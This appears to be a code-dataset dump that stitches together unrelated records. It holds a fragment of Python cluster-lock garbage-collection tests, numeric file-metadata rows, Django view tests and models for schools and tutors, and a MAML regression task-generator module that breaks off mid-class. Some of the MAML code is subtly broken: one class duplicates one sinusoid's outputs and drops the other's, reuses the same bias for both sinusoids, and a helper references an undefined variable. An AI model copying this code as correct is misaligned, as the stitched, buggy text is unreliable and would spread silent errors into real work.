action = shared.create_action(self.ctx, target=self.cluster.id,
status='RUNNING', owner=engine_id,
project=self.ctx.project_id)
db_api.cluster_lock_acquire(self.cluster.id, action.id, -1)
# do it
db_api.dummy_gc(engine_id)
# assertion
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID2, -1)
self.assertIn(UUID2, observed)
self.assertNotIn(action.id, observed)
new_action = db_api.action_get(self.ctx, action.id)
self.assertEqual('FAILED', new_action.status)
self.assertEqual("Engine failure", new_action.status_reason)
def test_delete_cluster_lock_and_node_lock_1(self):
# Test the case that an action is about node that also locked a
# cluster and the cluster lock can be released
#
# (dead-engine) --> Action --> NodeLock
# |action|owner| |node |action|
# | A1 | E1 | |N1 |A1 |
# --> ClusterLock
# |cluster|action|scope|
# |C1 |[A1] |1 |
# preparation
engine_id = UUID1
action = shared.create_action(self.ctx, target=self.node.id,
status='RUNNING', owner=engine_id,
project=self.ctx.project_id)
db_api.cluster_lock_acquire(self.cluster.id, action.id, 1)
db_api.node_lock_acquire(self.cluster.id, action.id)
# do it
db_api.dummy_gc(engine_id)
# assertion
# even a read lock is okay now
observed = db_api.cluster_lock_acquire(self.node.id, UUID2, 1)
self.assertIn(UUID2, observed)
self.assertNotIn(action.id, observed)
# node can be locked again
observed = db_api.node_lock_acquire(self.node.id, UUID2)
self.assertEqual(UUID2, observed)
new_action = db_api.action_get(self.ctx, action.id)
self.assertEqual('FAILED', new_action.status)
self.assertEqual("Engine failure", new_action.status_reason)
def test_delete_cluster_lock_and_node_lock_2(self):
# Test the case that an action is about node that also locked a
# cluster and the cluster lock will remain locked
#
# (dead-engine) --> Action --> NodeLock
# |action|owner| |node |action|
# | A1 | E1 | |N1 |A1 |
# --> ClusterLock
# |cluster|action |scope|
# |C1 |[A1, A2]|2 |
# preparation
engine_id = UUID1
action = shared.create_action(self.ctx, target=self.node.id,
status='RUNNING', owner=engine_id,
project=self.ctx.project_id)
db_api.cluster_lock_acquire(self.cluster.id, action.id, 1)
db_api.cluster_lock_acquire(self.cluster.id, UUID2, 1)
db_api.node_lock_acquire(self.node.id, action.id)
# do it
db_api.dummy_gc(engine_id)
# assertion
# a read lock is okay now and cluster lock state not broken
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID3, 1)
self.assertIn(UUID2, observed)
self.assertIn(UUID3, observed)
self.assertNotIn(action.id, observed)
# node can be locked again
observed = db_api.node_lock_acquire(self.node.id, UUID2)
self.assertEqual(UUID2, observed)
new_action = db_api.action_get(self.ctx, action.id)
self.assertEqual('FAILED', new_action.status)
self.assertEqual("Engine failure", new_action.status_reason)
def test_mult_engine_keep_node_scope_lock(self):
engine1 = UUID1
engine2 = UUID2
node2 = shared.create_node(self.ctx, self.cluster, self.profile)
c_action = shared.create_action(self.ctx, target=self.cluster.id,
status='WAITING', owner=engine1,
project=self.ctx.project_id)
n_action_1 = shared.create_action(self.ctx, target=self.node.id,
status='RUNNING', owner=engine1,
project=self.ctx.project_id)
n_action_2 = shared.create_action(self.ctx, target=node2.id,
status='RUNNING', owner=engine2,
project=self.ctx.project_id)
db_api.dependency_add(self.ctx, [n_action_1.id, n_action_2.id],
c_action.id)
db_api.cluster_lock_acquire(self.cluster.id, c_action.id, -1)
db_api.cluster_lock_acquire(self.cluster.id, n_action_1.id, 1)
db_api.cluster_lock_acquire(self.cluster.id, n_action_2.id, 1)
db_api.node_lock_acquire(self.node.id, n_action_1.id)
db_api.node_lock_acquire(node2.id, n_action_2.id)
# do it
db_api.dummy_gc(engine1)
# try to acquire cluster scope lock
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID3, -1)
self.assertIn(UUID3, observed)
self.assertEqual(1, len(observed))
# try to acquire node scope lock
UUID4 = uuidutils.generate_uuid()
observed = db_api.cluster_lock_acquire(self.node.id, UUID4, 1)
self.assertIn(UUID4, observed)
self.assertEqual(1, len(observed))
# node scope lock will be also released
UUID5 = uuidutils.generate_uuid()
observed = db_api.cluster_lock_acquire(node2.id, UUID5, 1)
self.assertIn(UUID5, observed)
self.assertEqual(1, len(observed))
# try to acquire node lock
UUID6 = uuidutils.generate_uuid()
observed = db_api.node_lock_acquire(self.node.id, UUID6)
self.assertEqual(UUID6, observed)
# node locks for actions owned by other engines are still there
UUID7 = uuidutils.generate_uuid()
observed = db_api.node_lock_acquire(node2.id, UUID7)
self.assertNotEqual(UUID7, observed)
self.assertEqual(n_action_2.id, observed)
# check dependency
dependents = db_api.dependency_get_depended(self.ctx, c_action.id)
self.assertEqual(0, len(dependents))
# check action status
new_c_action = db_api.action_get(self.ctx, c_action.id)
self.assertEqual('FAILED', new_c_action.status)
self.assertIsNone(new_c_action.owner)
new_n_action_1 = db_api.action_get(self.ctx, n_action_1.id)
self.assertEqual('FAILED', new_n_action_1.status)
self.assertIsNone(new_n_action_1.owner)
new_n_action_2 = db_api.action_get(self.ctx, n_action_2.id)
self.assertEqual('FAILED', new_n_action_2.status)
self.assertIsNone(new_n_action_2.owner)
| 40.640078
| 76
| 0.624539
| 2,580
| 20,889
| 4.860853
| 0.07093
| 0.043059
| 0.074635
| 0.079101
| 0.895702
| 0.889881
| 0.861734
| 0.841719
| 0.835898
| 0.798262
| 0
| 0.01939
| 0.279094
| 20,889
| 513
| 77
| 40.719298
| 0.813401
| 0.158983
| 0
| 0.784566
| 0
| 0
| 0.011501
| 0
| 0
| 0
| 0
| 0
| 0.385852
| 1
| 0.054662
| false
| 0
| 0.016077
| 0
| 0.080386
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dba92be26c9de4f86b5981a6feb5526a87d0b0f4
| 4,789
|
py
|
Python
|
sports_manager/tests/team/tests_team_delete_view.py
|
hbuyse/dj-sports-manager
|
7e32cc41347b968b4ede9ea6846de14d9504c3f9
|
[
"MIT"
] | null | null | null |
sports_manager/tests/team/tests_team_delete_view.py
|
hbuyse/dj-sports-manager
|
7e32cc41347b968b4ede9ea6846de14d9504c3f9
|
[
"MIT"
] | null | null | null |
sports_manager/tests/team/tests_team_delete_view.py
|
hbuyse/dj-sports-manager
|
7e32cc41347b968b4ede9ea6846de14d9504c3f9
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python
# coding=utf-8
"""Tests the views."""
# Django
from django.test import TestCase
from django.urls import reverse
from ..helper import create_team, create_user
class TestTeamUpdateViewAsAnonymous(TestCase):
"""Tests UpdateView for Post."""
def setUp(self):
"""Set up the tests."""
self.team_info, self.team = create_team()
def test_get_not_existing(self):
"""Tests."""
r = self.client.get(reverse('sports-manager:team-delete', kwargs={'slug': 'not-existing'}))
self.assertEqual(r.status_code, 403)
def test_get(self):
"""Tests."""
r = self.client.get(reverse('sports-manager:team-delete', kwargs={'slug': self.team.slug}))
self.assertEqual(r.status_code, 403)
def test_post(self):
"""Tests."""
r = self.client.post(reverse('sports-manager:team-delete', kwargs={'slug': self.team.slug}),
**self.team_info)
self.assertEqual(r.status_code, 403)
class TestTeamUpdateViewAsLogged(TestCase):
"""Tests UpdateView for Post."""
def setUp(self):
"""Tests."""
self.user_info = create_user()[0]
self.team_info, self.team = create_team()
def test_get_not_existing(self):
"""Tests."""
self.assertTrue(self.client.login(username=self.user_info['username'], password=self.user_info['password']))
r = self.client.get(reverse('sports-manager:team-delete', kwargs={'slug': 'toto'}))
self.assertEqual(r.status_code, 403)
def test_get(self):
"""Tests."""
self.assertTrue(self.client.login(username=self.user_info['username'], password=self.user_info['password']))
r = self.client.get(reverse('sports-manager:team-delete', kwargs={'slug': self.team.slug}))
self.assertEqual(r.status_code, 403)
def test_post(self):
"""Tests."""
self.assertTrue(self.client.login(username=self.user_info['username'], password=self.user_info['password']))
r = self.client.post(reverse('sports-manager:team-delete', kwargs={'slug': self.team.slug}),
**self.team_info)
self.assertEqual(r.status_code, 403)
class TestTeamUpdateViewAsStaff(TestCase):
"""Tests UpdateView for Post."""
def setUp(self):
"""Tests."""
self.user_info = create_user(staff=True)[0]
self.team_info, self.team = create_team()
def test_get_not_existing(self):
"""Tests."""
self.assertTrue(self.client.login(username=self.user_info['username'], password=self.user_info['password']))
r = self.client.get(reverse('sports-manager:team-delete', kwargs={'slug': 'toto'}))
self.assertEqual(r.status_code, 404)
def test_get(self):
"""Tests."""
self.assertTrue(self.client.login(username=self.user_info['username'], password=self.user_info['password']))
r = self.client.get(reverse('sports-manager:team-delete', kwargs={'slug': self.team.slug}))
self.assertEqual(r.status_code, 200)
self.assertEqual(r.context['team'], self.team)
def test_post(self):
"""Tests."""
self.assertTrue(self.client.login(username=self.user_info['username'], password=self.user_info['password']))
r = self.client.post(reverse('sports-manager:team-delete', kwargs={'slug': self.team.slug}))
self.assertEqual(r.status_code, 302)
self.assertEqual(r.url, reverse('sports-manager:team-list'))
class TestTeamUpdateViewAsSuperuser(TestCase):
"""Tests UpdateView for Post."""
def setUp(self):
"""Tests."""
self.user_info = create_user(superuser=True)[0]
self.team_info, self.team = create_team()
def test_get_not_existing(self):
"""Tests."""
self.assertTrue(self.client.login(username=self.user_info['username'], password=self.user_info['password']))
r = self.client.get(reverse('sports-manager:team-delete', kwargs={'slug': 'toto'}))
self.assertEqual(r.status_code, 404)
def test_get(self):
"""Tests."""
self.assertTrue(self.client.login(username=self.user_info['username'], password=self.user_info['password']))
r = self.client.get(reverse('sports-manager:team-delete', kwargs={'slug': self.team.slug}))
self.assertEqual(r.status_code, 200)
self.assertEqual(r.context['team'], self.team)
def test_post(self):
"""Tests."""
self.assertTrue(self.client.login(username=self.user_info['username'], password=self.user_info['password']))
r = self.client.post(reverse('sports-manager:team-delete', kwargs={'slug': self.team.slug}))
self.assertEqual(r.status_code, 302)
self.assertEqual(r.url, reverse('sports-manager:team-list'))
| 36.007519
| 116
| 0.644602
| 599
| 4,789
| 5.040067
| 0.106845
| 0.069559
| 0.083471
| 0.111295
| 0.903279
| 0.903279
| 0.903279
| 0.903279
| 0.889367
| 0.889367
| 0
| 0.010264
| 0.18626
| 4,789
| 132
| 117
| 36.280303
| 0.764434
| 0.060347
| 0
| 0.84058
| 0
| 0
| 0.132969
| 0.081967
| 0
| 0
| 0
| 0
| 0.362319
| 1
| 0.231884
| false
| 0.130435
| 0.043478
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
91a0b7b8e71f8fd8403361e9022d1e11cf8bf31e
| 2,279
|
py
|
Python
|
UserAuth/myapp/models.py
|
incomparable1992/django-user-authenications
|
7e6063c86219e757cf8d4215b338f289df024ad1
|
[
"Apache-2.0"
] | null | null | null |
UserAuth/myapp/models.py
|
incomparable1992/django-user-authenications
|
7e6063c86219e757cf8d4215b338f289df024ad1
|
[
"Apache-2.0"
] | 2
|
2020-06-06T01:03:33.000Z
|
2021-06-10T22:25:18.000Z
|
UserAuth/myapp/models.py
|
incomparable1992/django-user-authenications
|
7e6063c86219e757cf8d4215b338f289df024ad1
|
[
"Apache-2.0"
] | null | null | null |
from django.db import models
# Create your models here.
class School(models.Model):
name = models.CharField(max_length=30, blank=True, null=True)
location = models.CharField(max_length=30, blank=True, null=True)
email = models.EmailField(max_length=30, blank=True, null=True)
phone = models.BigIntegerField(blank=True, null=True)
photo = models.FileField(upload_to='image/image', null=True, blank=True, help_text="Upload only .png, .jpg & .jpeg image extension.")
video = models.FileField(upload_to='image/video', null=True, blank=True, help_text="Upload only mp4, etc..")
current_user = models.IntegerField()
class Meta:
db_table = 'shool'
verbose_name_plural = 'School'
managed = True
def __str__(self):
return self.name
class Coaching(models.Model):
name = models.CharField(max_length=30, blank=True, null=True)
location = models.CharField(max_length=30, blank=True, null=True)
email = models.EmailField(max_length=30, blank=True, null=True)
phone = models.BigIntegerField(blank=True, null=True)
photo = models.FileField(upload_to='image/image', null=True, blank=True, help_text="Upload only .png, .jpg & .jpeg image extension.")
video = models.FileField(upload_to='image/video', null=True, blank=True, help_text="Upload only mp4, etc..")
current_user = models.IntegerField()
class Meta:
db_table = 'coaching'
verbose_name_plural = 'Coaching'
managed = True
def __str__(self):
return self.name
class Tutor(models.Model):
name = models.CharField(max_length=30, blank=True, null=True)
location = models.CharField(max_length=30, blank=True, null=True)
email = models.EmailField(max_length=30, blank=True, null=True)
phone = models.BigIntegerField(blank=True, null=True)
photo = models.FileField(upload_to='image/image', null=True, blank=True, help_text="Upload only .png, .jpg & .jpeg image extension.")
video = models.FileField(upload_to='image/video', null=True, blank=True, help_text="Upload only mp4, etc..")
current_user = models.IntegerField()
class Meta:
db_table = 'tutor'
verbose_name_plural = 'Tutor'
managed = True
def __str__(self):
return self.name
| 39.293103
| 137
| 0.694164
| 306
| 2,279
| 5.022876
| 0.176471
| 0.1054
| 0.101496
| 0.132726
| 0.898504
| 0.898504
| 0.898504
| 0.898504
| 0.875732
| 0.823683
| 0
| 0.01123
| 0.179465
| 2,279
| 57
| 138
| 39.982456
| 0.810695
| 0.010531
| 0
| 0.767442
| 0
| 0
| 0.137594
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.069767
| false
| 0
| 0.023256
| 0.069767
| 0.790698
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
37e867d1e54d53cb6b81167b8f4eda624240c5d5
| 23,878
|
py
|
Python
|
maml/datasets/simple_functions.py
|
vuoristo/MMAML-Regression
|
1a8bea4d60461d8814e3c9f91427ed56378716ce
|
[
"MIT"
] | 13
|
2020-01-04T01:58:29.000Z
|
2022-02-26T14:37:15.000Z
|
maml/datasets/simple_functions.py
|
vuoristo/MMAML-Regression
|
1a8bea4d60461d8814e3c9f91427ed56378716ce
|
[
"MIT"
] | 1
|
2020-12-10T10:46:51.000Z
|
2020-12-13T19:31:38.000Z
|
maml/datasets/simple_functions.py
|
vuoristo/MMAML-Regression
|
1a8bea4d60461d8814e3c9f91427ed56378716ce
|
[
"MIT"
] | 3
|
2020-06-22T16:55:29.000Z
|
2021-12-06T20:54:37.000Z
|
import torch
import numpy as np
from maml.datasets.metadataset import Task
def generate_sinusoid_batch(amp_range, phase_range, input_range, num_samples,
batch_size, oracle, bias=0):
amp = np.random.uniform(amp_range[0], amp_range[1], [batch_size])
phase = np.random.uniform(phase_range[0], phase_range[1], [batch_size])
outputs = np.zeros([batch_size, num_samples, 1])
inputs = np.zeros([batch_size, num_samples, 1])
for i in range(batch_size):
inputs[i] = np.random.uniform(input_range[0], input_range[1],
[num_samples, 1])
outputs[i] = amp[i] * np.sin(inputs[i] - phase[i]) + bias
if oracle:
amps = np.ones_like(inputs) * amp.reshape(-1, 1, 1)
phases = np.ones_like(inputs) * phase.reshape(-1, 1, 1)
inputs = np.concatenate((inputs, amps, phases), axis=2)
return inputs, outputs, amp, phase
def generate_linear_batch(slope_range, intersect_range, input_range,
num_samples, batch_size, oracle):
slope = np.random.uniform(slope_range[0], slope_range[1], [batch_size])
intersect = np.random.uniform(intersect_range[0], intersect_range[1],
[batch_size])
outputs = np.zeros([batch_size, num_samples, 1])
inputs = np.zeros([batch_size, num_samples, 1])
for i in range(batch_size):
inputs[i] = np.random.uniform(input_range[0], input_range[1],
[num_samples, 1])
outputs[i] = inputs[i] * slope[i] + intersect[i]
if oracle:
slopes = np.ones_like(inputs) * slope.reshape(-1, 1, 1)
intersects = np.ones_like(inputs) * intersect.reshape(-1, 1, 1)
inputs = np.concatenate((inputs, slopes, intersects), axis=2)
return inputs, outputs, slope, intersect
class SimpleFunctionDataset(object):
def __init__(self, num_total_batches=200000, num_samples_per_function=5,
num_val_samples=5, meta_batch_size=75, oracle=False,
train=True, device='cpu', dtype=torch.float, **kwargs):
self._num_total_batches = num_total_batches
self._num_samples_per_function = num_samples_per_function
self._num_val_samples = num_val_samples
self._num_total_samples = num_samples_per_function
self._meta_batch_size = meta_batch_size
self._oracle = oracle
self._train = train
self._device = device
self._dtype = dtype
def _generate_batch(self):
raise NotImplementedError('Subclass should implement _generate_batch')
def __iter__(self):
for batch in range(self._num_total_batches):
inputs, outputs, infos = self._generate_batch()
train_tasks = []
val_tasks = []
for task in range(self._meta_batch_size):
task_inputs = torch.tensor(
inputs[task], device=self._device, dtype=self._dtype)
task_outputs = torch.tensor(
outputs[task], device=self._device, dtype=self._dtype)
task_infos = infos[task]
train_task = Task(task_inputs[self._num_val_samples:],
task_outputs[self._num_val_samples:],
task_infos)
train_tasks.append(train_task)
val_task = Task(task_inputs[:self._num_val_samples],
task_outputs[:self._num_val_samples],
task_infos)
val_tasks.append(val_task)
yield train_tasks, val_tasks
class BiasedSinusoidMetaDataset(SimpleFunctionDataset):
def __init__(self, amp_range=[0.1, 5.0], phase_range=[0, np.pi],
input_range=[-5.0, 5.0], bias=0, **kwargs):
super(BiasedSinusoidMetaDataset, self).__init__(**kwargs)
self._amp_range = amp_range
self._phase_range = phase_range
self._input_range = input_range
self._bias = bias
if self._oracle:
self.input_size = 3
else:
self.input_size = 1
self.output_size = 1
def _generate_batch(self):
inputs, outputs, amp, phase = generate_sinusoid_batch(
amp_range=self._amp_range, phase_range=self._phase_range,
input_range=self._input_range,
num_samples=self._num_total_samples,
batch_size=self._meta_batch_size, oracle=self._oracle, bias=self._bias)
task_infos = [{'task_id': 0, 'amp': amp[i], 'phase': phase[i]}
for i in range(len(amp))]
return inputs, outputs, task_infos
class SinusoidMetaDataset(SimpleFunctionDataset):
def __init__(self, amp_range=[0.1, 5.0], phase_range=[0, np.pi],
input_range=[-5.0, 5.0], **kwargs):
super(SinusoidMetaDataset, self).__init__(**kwargs)
self._amp_range = amp_range
self._phase_range = phase_range
self._input_range = input_range
if self._oracle:
self.input_size = 3
else:
self.input_size = 1
self.output_size = 1
def _generate_batch(self):
inputs, outputs, amp, phase = generate_sinusoid_batch(
amp_range=self._amp_range, phase_range=self._phase_range,
input_range=self._input_range,
num_samples=self._num_total_samples,
batch_size=self._meta_batch_size, oracle=self._oracle)
task_infos = [{'task_id': 0, 'amp': amp[i], 'phase': phase[i]}
for i in range(len(amp))]
return inputs, outputs, task_infos
class LinearMetaDataset(SimpleFunctionDataset):
def __init__(self, slope_range=[-3.0, 3.0], intersect_range=[-3, 3],
input_range=[-5.0, 5.0], **kwargs):
super(LinearMetaDataset, self).__init__(**kwargs)
self._slope_range = slope_range
self._intersect_range = intersect_range
self._input_range = input_range
if self._oracle:
self.input_size = 3
else:
self.input_size = 1
self.output_size = 1
def _generate_batch(self):
inputs, outputs, slope, intersect = generate_linear_batch(
slope_range=self._slope_range,
intersect_range=self._intersect_range,
input_range=self._input_range,
num_samples=self._num_total_samples,
batch_size=self._meta_batch_size, oracle=self._oracle)
task_infos = [{'task_id': 0, 'slope': slope[i], 'intersect': intersect[i]}
for i in range(len(slope))]
return inputs, outputs, task_infos
def generate_quadratic_batch(center_range, bias_range, sign_range, input_range,
num_samples, batch_size, oracle):
center = np.random.uniform(center_range[0], center_range[1], [batch_size])
bias = np.random.uniform(bias_range[0], bias_range[1], [batch_size])
# alpha range
alpha = np.random.uniform(sign_range[0], sign_range[1], [batch_size])
sign = np.random.randint(2, size=[batch_size])
sign[sign == 0] = -1
sign = alpha * sign
outputs = np.zeros([batch_size, num_samples, 1])
inputs = np.zeros([batch_size, num_samples, 1])
for i in range(batch_size):
inputs[i] = np.random.uniform(input_range[0], input_range[1],
[num_samples, 1])
outputs[i] = sign[i] * (inputs[i] - center[i])**2 + bias[i]
if oracle:
centers = np.ones_like(inputs) * center.reshape(-1, 1, 1)
biases = np.ones_like(inputs) * bias.reshape(-1, 1, 1)
inputs = np.concatenate((inputs, centers, biases), axis=2)
return inputs, outputs, sign, center, bias
class QuadraticMetaDataset(SimpleFunctionDataset):
""" Quadratic function like: sign * (x - center)^2 + bias
"""
def __init__(self, center_range=[-3.0, 3.0], bias_range=[-3, 3], sign_range=[0.02, 0.15],
input_range=[-5.0, 5.0], **kwargs):
super(QuadraticMetaDataset, self).__init__(**kwargs)
self._center_range = center_range
self._bias_range = bias_range
self._input_range = input_range
self._sign_range = sign_range
if self._oracle:
self.input_size = 3
else:
self.input_size = 1
self.output_size = 1
def _generate_batch(self):
inputs, outputs, sign, center, bias = generate_quadratic_batch(
center_range=self._center_range,
bias_range=self._bias_range,
sign_range=self._sign_range,
input_range=self._input_range,
num_samples=self._num_total_samples,
batch_size=self._meta_batch_size, oracle=self._oracle)
task_infos = [{'task_id': 2, 'sign': sign[i], 'center': center[i], 'bias': bias[i]}
for i in range(len(sign))]
return inputs, outputs, task_infos
class MixedFunctionsMetaDataset(SimpleFunctionDataset):
def __init__(self, amp_range=[0.1, 5.0], phase_range=[0, np.pi],
input_range=[-5.0, 5.0], slope_range=[-3.0, 3.0],
intersect_range=[-3.0, 3.0], task_oracle=False,
noise_std=0, **kwargs):
super(MixedFunctionsMetaDataset, self).__init__(**kwargs)
self._amp_range = amp_range
self._phase_range = phase_range
self._slope_range = slope_range
self._intersect_range = intersect_range
self._input_range = input_range
self._task_oracle = task_oracle
self._noise_std = noise_std
if not self._oracle:
if not self._task_oracle:
self.input_size = 1
else:
self.input_size = 2
else:
if not self._task_oracle:
self.input_size = 3
else:
self.input_size = 4
self.output_size = 1
self.num_tasks = 2
def _generate_batch(self):
half_batch_size = self._meta_batch_size // 2
sin_inputs, sin_outputs, amp, phase = generate_sinusoid_batch(
amp_range=self._amp_range, phase_range=self._phase_range,
input_range=self._input_range,
num_samples=self._num_total_samples,
batch_size=half_batch_size, oracle=self._oracle)
sin_task_infos = [{'task_id': 0, 'amp': amp[i], 'phase': phase[i]}
for i in range(len(amp))]
if self._task_oracle:
sin_inputs = np.concatenate(
(sin_inputs, np.zeros(sin_inputs.shape[:2] + (1,))), axis=2)
lin_inputs, lin_outputs, slope, intersect = generate_linear_batch(
slope_range=self._slope_range,
intersect_range=self._intersect_range,
input_range=self._input_range,
num_samples=self._num_total_samples,
batch_size=half_batch_size, oracle=self._oracle)
lin_task_infos = [{'task_id': 1, 'slope': slope[i], 'intersect': intersect[i]}
for i in range(len(slope))]
if self._task_oracle:
lin_inputs = np.concatenate(
(lin_inputs, np.ones(lin_inputs.shape[:2] + (1,))), axis=2)
inputs = np.concatenate((sin_inputs, lin_inputs))
outputs = np.concatenate((sin_outputs, lin_outputs))
if self._noise_std > 0:
outputs = outputs + np.random.normal(scale=self._noise_std, size=outputs.shape)
task_infos = sin_task_infos + lin_task_infos
return inputs, outputs, task_infos
class ManyFunctionsMetaDataset(SimpleFunctionDataset):
def __init__(self, amp_range=[0.1, 5.0], phase_range=[0, np.pi],
input_range=[-5.0, 5.0], slope_range=[-3.0, 3.0],
intersect_range=[-3.0, 3.0], center_range=[-3.0, 3.0],
bias_range=[-3.0, 3.0], sign_range=[0.02, 0.15], task_oracle=False,
noise_std=0, **kwargs):
super(ManyFunctionsMetaDataset, self).__init__(**kwargs)
self._amp_range = amp_range
self._phase_range = phase_range
self._slope_range = slope_range
self._intersect_range = intersect_range
self._input_range = input_range
self._center_range = center_range
self._bias_range = bias_range
self._sign_range = sign_range
self._task_oracle = task_oracle
self._noise_std = noise_std
if not self._oracle:
if not self._task_oracle:
self.input_size = 1
else:
self.input_size = 2
else:
if not self._task_oracle:
self.input_size = 3
else:
self.input_size = 4
self.output_size = 1
self.num_tasks = 2
def _generate_batch(self):
half_batch_size = self._meta_batch_size // 3
sin_inputs, sin_outputs, amp, phase = generate_sinusoid_batch(
amp_range=self._amp_range, phase_range=self._phase_range,
input_range=self._input_range,
num_samples=self._num_total_samples,
batch_size=half_batch_size, oracle=self._oracle)
sin_task_infos = [{'task_id': 0, 'amp': amp[i], 'phase': phase[i]}
for i in range(len(amp))]
if self._task_oracle:
sin_inputs = np.concatenate(
(sin_inputs, np.zeros(sin_inputs.shape[:2] + (1,))), axis=2)
lin_inputs, lin_outputs, slope, intersect = generate_linear_batch(
slope_range=self._slope_range,
intersect_range=self._intersect_range,
input_range=self._input_range,
num_samples=self._num_total_samples,
batch_size=half_batch_size, oracle=self._oracle)
lin_task_infos = [{'task_id': 1, 'slope': slope[i], 'intersect': intersect[i]}
for i in range(len(slope))]
if self._task_oracle:
lin_inputs = np.concatenate(
(lin_inputs, np.ones(lin_inputs.shape[:2] + (1,))), axis=2)
qua_inputs, qua_outputs, sign, center, bias = generate_quadratic_batch(
center_range=self._center_range,
bias_range=self._bias_range,
sign_range=self._sign_range,
input_range=self._input_range,
num_samples=self._num_total_samples,
batch_size=half_batch_size, oracle=self._oracle)
qua_task_infos = [{'task_id': 2, 'sign': sign[i], 'center': center[i], 'bias': bias[i]}
for i in range(len(sign))]
if self._task_oracle:
qua_inputs = np.concatenate(
(qua_inputs, np.ones(qua_inputs.shape[:2] + (1,))), axis=2)
inputs = np.concatenate((sin_inputs, lin_inputs, qua_inputs))
outputs = np.concatenate((sin_outputs, lin_outputs, qua_outputs))
if self._noise_std > 0:
outputs = outputs + np.random.normal(scale=self._noise_std, size=outputs.shape)
task_infos = sin_task_infos + lin_task_infos + qua_task_infos
return inputs, outputs, task_infos
class MultiSinusoidsMetaDataset(SimpleFunctionDataset):
def __init__(self, amp_range=[0.1, 5.0], phase_range=[0, np.pi], biases=(-5, 5),
input_range=[-5.0, 5.0], task_oracle=False,
noise_std=0, **kwargs):
super(MultiSinusoidsMetaDataset, self).__init__(**kwargs)
self._amp_range = amp_range
self._phase_range = phase_range
self._input_range = input_range
self._task_oracle = task_oracle
self._noise_std = noise_std
self._biases = biases
if not self._oracle:
if not self._task_oracle:
self.input_size = 1
else:
self.input_size = 2
else:
if not self._task_oracle:
self.input_size = 3
else:
self.input_size = 4
self.output_size = 1
self.num_tasks = 2
def _generate_batch(self):
half_batch_size = self._meta_batch_size // 2
sin1_inputs, sin1_outputs, amp1, phase1 = generate_sinusoid_batch(
amp_range=self._amp_range, phase_range=self._phase_range,
input_range=self._input_range,
num_samples=self._num_total_samples,
batch_size=half_batch_size, oracle=self._oracle, bias=self._biases[0])
sin1_task_infos = [{'task_id': 0, 'amp': amp1[i], 'phase': phase1[i]}
for i in range(len(amp1))]
if self._task_oracle:
sin1_inputs = np.concatenate(
(sin1_inputs, np.zeros(sin1_inputs.shape[:2] + (1,))), axis=2)
sin2_inputs, sin2_outputs, amp2, phase2 = generate_sinusoid_batch(
amp_range=self._amp_range, phase_range=self._phase_range,
input_range=self._input_range,
num_samples=self._num_total_samples,
batch_size=half_batch_size, oracle=self._oracle, bias=self._biases[0])
sin2_task_infos = [{'task_id': 1, 'amp': amp2[i], 'phase': phase2[i]}
for i in range(len(amp2))]
if self._task_oracle:
sin2_inputs = np.concatenate(
(sin2_inputs, np.zeros(sin2_inputs.shape[:2] + (1,))), axis=2)
inputs = np.concatenate((sin1_inputs, sin2_inputs))
outputs = np.concatenate((sin2_outputs, sin2_outputs))
if self._noise_std > 0:
outputs = outputs + np.random.normal(scale=self._noise_std,
size=outputs.shape)
task_infos = sin1_task_infos + sin2_task_infos
return inputs, outputs, task_infos
def generate_tanh_batch(center_range, bias_range, slope_range, input_range,
num_samples, batch_size, oracle):
center = np.random.uniform(center_range[0], center_range[1], [batch_size])
bias = np.random.uniform(bias_range[0], bias_range[1], [batch_size])
# alpha range
slope = np.random.uniform(slope_range[0], slope_range[1], [batch_size])
outputs = np.zeros([batch_size, num_samples, 1])
inputs = np.zeros([batch_size, num_samples, 1])
for i in range(batch_size):
inputs[i] = np.random.uniform(input_range[0], input_range[1],
[num_samples, 1])
outputs[i] = slope[i] * np.tanh(inputs[i] - center[i]) + bias[i]
if oracle:
centers = np.ones_like(inputs) * center.reshape(-1, 1, 1)
biases = np.ones_like(inputs) * bias.reshape(-1, 1, 1)
inputs = np.concatenate((inputs, centers, biases), axis=2)
return inputs, outputs, slope, center, bias
def generate_abs_batch(slope_range, center_range, bias_range, input_range,
num_samples, batch_size, oracle):
slope = np.random.uniform(slope_range[0], slope_range[1], [batch_size])
bias = np.random.uniform(bias_range[0], bias_range[1], [batch_size])
center = np.random.uniform(center_range[0], center_range[1], [batch_size])
outputs = np.zeros([batch_size, num_samples, 1])
inputs = np.zeros([batch_size, num_samples, 1])
for i in range(batch_size):
inputs[i] = np.random.uniform(input_range[0], input_range[1],
[num_samples, 1])
outputs[i] = np.abs(inputs[i] - center[i]) * slope[i] + bias[i]
if oracle:
slopes = np.ones_like(inputs) * slope.reshape(-1, 1, 1)
intersects = np.ones_like(inputs) * intersect.reshape(-1, 1, 1)
inputs = np.concatenate((inputs, slopes, intersects), axis=2)
return inputs, outputs, slope, center, bias
class FiveFunctionsMetaDataset(SimpleFunctionDataset):
def __init__(self, amp_range=[0.1, 5.0], phase_range=[0, np.pi],
input_range=[-5.0, 5.0], slope_range=[-3.0, 3.0],
intersect_range=[-3.0, 3.0], center_range=[-3.0, 3.0],
bias_range=[-3.0, 3.0], sign_range=[0.02, 0.15], task_oracle=False,
noise_std=0, **kwargs):
super(FiveFunctionsMetaDataset, self).__init__(**kwargs)
self._amp_range = amp_range
self._phase_range = phase_range
self._slope_range = slope_range
self._intersect_range = intersect_range
self._input_range = input_range
self._center_range = center_range
self._bias_range = bias_range
self._sign_range = sign_range
